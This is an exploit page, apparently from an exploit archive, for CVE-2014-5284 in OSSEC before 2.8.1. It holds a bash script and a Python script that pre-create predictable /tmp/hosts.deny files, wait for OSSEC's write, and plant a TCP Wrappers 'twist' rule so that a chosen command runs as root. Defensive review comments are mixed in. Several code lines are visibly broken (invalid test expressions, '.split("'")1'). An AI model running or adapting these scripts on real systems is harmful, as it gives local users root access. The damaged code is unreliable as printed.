
CVE-2014-5284 OSSEC before 2.8.1权限提升漏洞


INFO

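host-deny.sh in OSSEC before 2.8.1 writes to temporary files with predictable filenames without verifying ownership, which allows local users to modify access restrictions in hosts.deny and gain root privileges by creating the temporary files before automatic IP blocking is performed. Control of hosts.deny leads to root because a TCP Wrappers rule can carry an option that runs a command when a matching connection arrives (the listings below use `twist`), and that command runs in the context of the wrapped service. The advisory's version bound places the fix in 2.8.1.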

CVE-2014-5284.sh

#!/bin/bash

### CVE-2014-5284
### Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation
### Python is nice but doesn't work all the time
### Exploit Author: mbadanoiu

# Python Exploit Author: skynet-13
# Vendor Homepage: www.ossec.net/
# Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz
# Version: OSSEC  - 2.8

# Created from Research by
# Jeff Petersen
# Roka Security LLC
# email protected
# Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1

#######################################
# Pre-creates an empty file for every candidate temporary-file name
# /tmp/hosts.deny.<n>, with <n> taken from the global $range (set in the main
# section to the output of `seq 300 65535`).
#
# This is the precondition named in the advisory text: host-deny.sh writes to
# a predictable name under /tmp without verifying ownership, so a file that
# already exists under that name keeps its unprivileged owner.
# NOTE(review): the numeric suffix is presumably the PID of the host-deny.sh
# run; confirm against the OSSEC source.
#
# Detection: a large number of zero-length /tmp/hosts.deny.* files owned by a
# non-root account is a strong indicator of this technique.
#
# Globals:   range (read)
# Outputs:   progress banner on stdout; files under /tmp
#######################################
function create_files {
	echo "=============================================="
	# The banner says 65536, but $range as set in the main section ends at 65535.
	echo "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..."

	# $range is left unquoted so that it word-splits into one number per iteration.
	for i in $range; do
		# Truncate-or-create: leaves an empty file owned by the calling user.
		echo -n > /tmp/hosts.deny.$i
	done
}

#######################################
# Prints operator instructions, then blocks on inotifywait until a file in
# /tmp/ whose name matches "hosts.deny." is closed after writing, and hands
# the first such path to on_file_change.
#
# The trigger being waited for is the write that the advisory text attributes
# to OSSEC's automatic IP blocking (host-deny.sh).
# NOTE(review): the "10 mins" in the banner presumably reflects an OSSEC
# active-response timing; confirm against the deployed configuration.
#
# Globals:   inotifywait (read) - path to the inotifywait binary
# Outputs:   banner on stdout
#######################################
function watch_files {
	echo "=============================================="
        echo "Monitoring tmp for file change...."
        echo "ssh into the system a few times with an incorrect password"
        echo "Then wait for up to 10 mins"
        echo "=============================================="

	####insert non-empty logic here
	# The while loop is the right-hand side of a pipeline, so it runs in a
	# subshell; only the first event is handled (break follows immediately).
	"$inotifywait" -e close_write /tmp/ --include "hosts.deny." |
	while read -r dir events file; do
		# inotifywait prints "<dir> <events> <file>"; dir and file are joined
		# back into the full path of the file that was written.
		on_file_change "$dir$file"
		break
	done
}

#######################################
# Reports which watched file was written and passes it on to
# write_exploit_to_file.
#
# Arguments: $1 - full path of the file reported by inotifywait
# Outputs:   one status line on stdout
#######################################
function on_file_change {
	local file="$1"
	echo "File: $file has just been modified"
	write_exploit_to_file "$file"
}

#######################################
# Overwrites the given file with a single TCP Wrappers rule for sshd whose
# option is `twist` followed by the global $cmd, prints closing instructions
# and exits.
#
# Defender view: the advisory states that these temporary files feed
# hosts.deny, so the result is an attacker-chosen rule in hosts.deny.
# A `twist` (or other command-running) option in hosts.deny that nobody on
# the admin team added is the artefact to look for; file-integrity monitoring
# on hosts.deny and upgrading OSSEC to 2.8.1 or later address it.
#
# Globals:   cmd (read)
# Arguments: $1 - path of the temporary file to overwrite
# Outputs:   status banner on stdout
#######################################
function write_exploit_to_file {
	local file="$1"
	# The write comes before any banner output (see the author's note on the line).
	echo " sshd : ALL : twist $cmd " > "$file"	###Don't waste time with printing

	echo 'Writing exploit to this file'
	echo "=============================================="
        echo " ssh in again to execute the command"
        echo "=============================================="
        echo "               End Prog."
	# No status is given, so exit returns the status of the preceding echo.
	exit
}

#######################################
# Intended to confirm that an inotifywait binary is available: first at the
# path held in the global $inotifywait, then via `which`; prints build
# instructions and exits when neither is found.
#
# NOTE(review): both `if` conditions are reproduced exactly as they appear on
# the page. As printed they are not valid test expressions (the page
# extraction appears to have dropped characters), so this listing documents
# the technique rather than being runnable as shown.
#
# Globals:   inotifywait (read, possibly overwritten with the `which` result)
# Outputs:   build instructions on stdout when no binary is found
#######################################
function verify_inotifywait {
	if  ! -f "$inotifywait" ; then
		# Fall back to whatever inotifywait is on PATH.
		inotifywait=$(which inotifywait)
		if  ! "$inotifywait" ; then
			echo -e "\nNo inotifywait found on the target!"
			echo "Configure and make inotify-tools then run this script again:"
			echo -e "\tcd inotify-tools && ./autogen.sh && ./configure && make\n"
			exit
		fi
	fi
}

#####MAIN######
# Entry point. Takes one argument, the command string that
# write_exploit_to_file embeds after `twist` in the hosts.deny rule.
#
# Defender summary for this listing: it only works where OSSEC's host-deny.sh
# is a version before 2.8.1 (per the advisory text) and where unprivileged
# users can create files in /tmp. Upgrading OSSEC is the fix; leftover
# /tmp/hosts.deny.* files and unexpected hosts.deny rules are the traces.
cmd="$1"

# NOTE(review): reproduced as printed; the condition is not a valid test
# expression on this page (characters appear to have been lost in extraction).
if  -z "$cmd" ; then
	echo "Usage of program:"
	echo -e "\tbash $0 <Command_to_run_as_root_in_quotes>"
	exit
fi

# Candidate numeric suffixes for the temporary-file name, one per line.
range=$(seq 300 65535)

# Resolve the directory this script lives in; inotifywait is expected in an
# inotify-tools build tree next to it.
SCRIPT=$(realpath "$0")
SCRIPTPATH=$(dirname "$SCRIPT")
inotifywait="$SCRIPTPATH/inotify-tools/src/inotifywait"

verify_inotifywait

# Order matters: the files must exist before the watched write happens.
create_files
watch_files

ossec_host_deny.py

#!/usr/bin/python
# Exploit Title: ossec 2.8 Insecure Temporary File Creation Vulnerability Privilege Escalation
# Date: 14-11-14
# Exploit Author: skynet-13
# Exploit Modifier: mbadanoiu
# Vendor Homepage: www.ossec.net/
# Software Link: https://github.com/ossec/ossec-hids/archive/2.8.1.tar.gz
# Version: OSSEC  - 2.8
# Tested on: Ubunutu x86_64
# CVE : 2014-5284

# Created from Research by
# Jeff Petersen
# Roka Security LLC
# email protected
# Original info at https://github.com/ossec/ossec-hids/releases/tag/2.8.1

# Run this on target machine and follow instructions to execute command as root

from twisted.internet import inotify
from twisted.python import filepath
from twisted.internet import reactor
import os
import optparse
import signal


# Python 2 / Twisted variant of the shell listing above: pre-create the
# predictable temporary files, watch the directory with inotify, and overwrite
# the first "hosts.deny" file that changes with a TCP Wrappers rule.
#
# Defender view: the same traces apply as for the shell version. Look for a
# large number of empty /tmp/hosts.deny.* files owned by a non-root account
# and for an unexpected `twist` option in hosts.deny. Per the advisory text
# the issue affects OSSEC before 2.8.1.
#
# NOTE(review): the listing is reproduced as printed. `.split("'")1` is not
# valid Python, and on_file_change mixes tabs and spaces; the page extraction
# appears to have damaged the code, so read it as documentation of the
# technique rather than as runnable code.
class HostDenyExploiter(object):

    # path_to_watch: directory handed to the inotify watcher.
    # cmd: command string later embedded in the hosts.deny rule.
    def __init__(self, path_to_watch, cmd):
        self.path = path_to_watch
        self.notifier = inotify.INotify()
        self.exploit = cmd

    # Creates an empty /tmp/hosts.deny.<n> for n in 300..65535. The banner
    # says 65536, but range(300, 65536) stops at 65535.
    # NOTE(review): <n> is presumably the PID of the host-deny.sh run; confirm
    # against the OSSEC source.
    def create_files(self):
        print "=============================================="
        print "Creating /tmp/hosts.deny.300 through /tmp/hosts.deny.65536 ..."

        for i in range(300, 65536):
            filename = "/tmp/hosts.deny.%s" % i
            # Opening in 'w' mode creates the file (or truncates it) as the
            # calling user; nothing but an empty string is written.
            f = open(filename, 'w')
            f.write("")
            f.close()

    # Prints operator instructions and registers on_file_change as the
    # callback for events on self.path. The watch only fires once the
    # reactor is running (started in the __main__ section).
    def watch_files(self):
        print "=============================================="
        print "Monitoring tmp for file change...."
        print "ssh into the system a few times with an incorrect password"
        print "Then wait for up to 10 mins"
        print "=============================================="
        self.notifier.startReading()
        self.notifier.watch(filepath.FilePath(self.path), callbacks=self.on_file_change)

    # Overwrites the changed file with one rule, " sshd : ALL : twist <cmd> ",
    # then signals its own process with SIGUSR1. No handler for that signal
    # is installed in this listing.
    def write_exploit_to_file(self, path):
        print 'Writing exploit to this file'
        # The file name is pulled out of the quoted part of str(path).
        f = open(str(path).split("'")1, 'w')
        f.write(' sshd : ALL : twist %s \n' % self.exploit)
        f.close()
        print "=============================================="
        print " ssh in again to execute the command"
        print "=============================================="
        print "               End Prog."
        os.kill(os.getpid(), signal.SIGUSR1)

    # inotify callback: logs every reported path, and for a path containing
    # 'hosts.deny' stops the notifier and hands the path on for overwriting.
    def on_file_change(self, watch, path, mask):
	file=str(path).split("'")1
        print 'File: ', file, ' has just been modified'
	if 'hosts.deny' in file:
	        self.notifier.stopReading()
        	self.write_exploit_to_file(path)


# Entry point: parses the single -c option, then runs the create/watch
# sequence against /tmp under the Twisted reactor.
if __name__ == '__main__':
    parser = optparse.OptionParser("usage of program \n" + "-c Command to run as root in quotes\n")
    parser.add_option('-c', dest='cmd', type='string', help='Used to specify a command to run as root')
    (options, args) = parser.parse_args()
    cmd = options.cmd
    # Without -c there is nothing to embed in the rule: print usage and stop.
    if options.cmd is None:
        print parser.usage
        exit(0)
    # The watched directory is hard-coded to /tmp, matching the path that
    # create_files writes to.
    ex = HostDenyExploiter('/tmp', cmd)
    # Order matters: the files are created before the watch is registered.
    ex.create_files()
    ex.watch_files()
    # Blocks here; inotify callbacks are delivered from the reactor loop.
    reactor.run()
    exit(0)
